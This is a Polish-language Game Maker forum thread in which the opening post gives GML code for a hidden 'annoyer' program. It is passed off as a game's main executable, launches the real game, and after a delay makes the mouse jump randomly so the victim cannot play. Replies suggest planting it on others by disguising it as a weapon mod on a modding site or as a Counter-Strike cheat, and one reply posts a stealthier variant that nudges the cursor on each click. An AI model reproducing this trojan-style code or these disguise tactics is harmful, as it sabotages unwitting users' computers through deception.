Skocz do zawartości

Wkurzacz do strzelanek 3D typu CS


Rekomendowane odpowiedzi

Napisałem taki kursik: jak zrobic wkurzacza np do Counter Strike-a i takich gier podobnych.

No to zaczynamy:

 

Tworzymy obiekt o nazwie wkurzacz i piszemy:

Create:

GML
window_set_visible(false) //robimy zeby okienko bylo niewidoczne

// teraz ten plik musimy komus podczepic jako plik glowny gry np gra.exe

// a prawdziwy plik z grą piszemy np. gra2.exe

execute_shell('gra2.exe',0) // wlaczamy prawdziwy plik, jak nie masz gra2.exe to se zmien :)

alarm[0]=500 // odczekujemy jakis czas az se ziom tam włączy gre i w ogole i zacznie grac

odczekane=false // tworzymy zmienna przez ktora mozna sprawdzic czy juz odczekalo

Alarm[0]:

GML
odczekane=true //gdy juz odczeka to ma zmienna byc true

Step:

GML
if odczekane //sprawdzamy czy odczekane=true

{

if keyboard_check_direct(vk_anykey) //sprawdzamy czy jest klikniety jakikolwiek przycisk

{

window_mouse_set(random(1000),random(1000)) //jesli tak to przywalamy myszke na losowa pozycje i mu karabin lata :)

}

}

 

No i mamy takie coś :]

Pozdro

Odnośnik do komentarza
Udostępnij na innych stronach

Proste: "program" po pewnym czasie wlacza sie w tryb "szalenstwa myszki", czyli kursor ciagle zmienia pozycje na losowa, co nie pozwala grac, tym samym wnerwia gracza.

Odnośnik do komentarza
Udostępnij na innych stronach

Gracz przez takie coś moze przestać w to grać na zwawsze =O

i dobrze. ostatnio bylo takie cos ze cegłą zarąbał kolege przez to ze go pokonal w cs-sie - szaleniec przez cs-a.

napisz taki program według mojego kursu, podczep komuś i może uratujesz komuś życie :D:D

Łatwe to ale tylko głupi by się na to nabrał.

Zazwyczaj głupie lamki grają w cs-y itp.. ;]

Można się naawet skapnąć po samym kodzie o co chodzić będzie w tym programie tongue2.gif

no tak, ale ofiara chyba nie będzie widziec kodu nie? chyba ze ci chodzi o to ze z punktu widzenia twojego i innych ktorzy to czytają no to tak.

Odnośnik do komentarza
Udostępnij na innych stronach

Ale jak masz zamiar to rozpowszechniać ? Będziesz do każdego maniaka strzelanek chodzić z pendrive/płytą/innym nosnikiem danych i wrzucać mu taki programik ? Można w ostateczności wrzucić na stronkę zajmującą się moddingiem np. www.fpsbanana.com pod przykrywką, że to nowa broń, ale i tak wkońcu trafi się ktoś kto się zna na tym i owym i się zkapnie, że oprócz fajowej broni pobrał gratisowego "pomocnika"

 

Na moje bez sensu...

 

EDIT: Dałem 1 gwiazdke, na zachętę >.< pomysł i nic po za tym. Spróbuj teraz z Tibią ;F

Odnośnik do komentarza
Udostępnij na innych stronach

Ale jak masz zamiar to rozpowszechniać ? Będziesz do każdego maniaka strzelanek chodzić z pendrive/płytą/innym nosnikiem danych i wrzucać mu taki programik ? Można w ostateczności wrzucić na stronkę zajmującą się moddingiem np. www.fpsbanana.com pod przykrywką, że to nowa broń, ale i tak wkońcu trafi się ktoś kto się zna na tym i owym i się zkapnie, że oprócz fajowej broni pobrał gratisowego "pomocnika"

 

Na moje bez sensu...

 

Z tego co pamiętam, dużo osób właśnie szuka "czitów" do CS'a... Może to gdzieś wrzucić, pod przykrywką że jest to np. Wall-Hack... I ktoś go pobiera, uruchamia, i ma nauczkę, bo "czitów" się nie używa :D

 

 

Edit: Jak pisałem, to nie widziałem posta XxMichałxX

Odnośnik do komentarza
Udostępnij na innych stronach

Michał, jesteś moim idolem :*

 

//sprawdzamy czy odczekane=true
Po 1. to true/false to w GMie najzwyczajniejsze na świecie stałe, dokładnie identyczne jak te, które se możesz w opcjach projektu ustawić (true=1, false=0)

A po 2. to nie sprawdza, czy jest równe true, tylko, czy jest >0.

 

Nieprzydatne, napisze to każdy noob, no i w ogóle, bez sensu... :P

Rozumiem, że dla Ciebie to wyczyn, Michałku, ale to naprawdę nic wielkiego ten programik.

 

Pała, naturalnie.

Odnośnik do komentarza
Udostępnij na innych stronach

Nie dość, że naciągany temat to jeszcze ty naciągasz <_< (XxMichałxX), proponuję zamknąć temat, bo są podawane tylko bez sensowne zastosowania tego lipnego przykładu.

 

@UP : No jak tak bardzo się uparłeś, to niech już ci będzie, że to będzie zaczepisty "czit" który uratuje życie wielu niewinnym istotom.

Odnośnik do komentarza
Udostępnij na innych stronach

GML (Create)
r=false; // Zmienna potrzebna, żeby sprawdzić, czy puściliśmy przycisk

roz=20; // 'Rozrzut' myszki

window_set_visible( false ); // Chowamy okienko

GML (Step)
if( keyboard_check_direct( mb_left ) ) // Gdy klikniemy myszkę

{

if( r == false ) // Zmienna zapobiegająca ciągłemu poruszaniu myszką ( działa tylko na pojedyncze kliknięcie )

{

window_mouse_set( window_mouse_get_x() - roz/2 + random( roz ), window_mouse_get_y() - roz/2 + random( roz ) ); // Przestawiamy myszkę losowo maksymalnie o połowę 'rozrzutu'

r = true;

}

} else r = false; // Dzięki temu kod zadziała po puszczeniu myszki

 

Proszę bardzo... Za każdym kliknięciem przesunie nam odrobinkę myszkę

Odnośnik do komentarza
Udostępnij na innych stronach

Michal, lul, to sprawdza czy wcisniety zostal LPM gdzies poza oknem..

Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...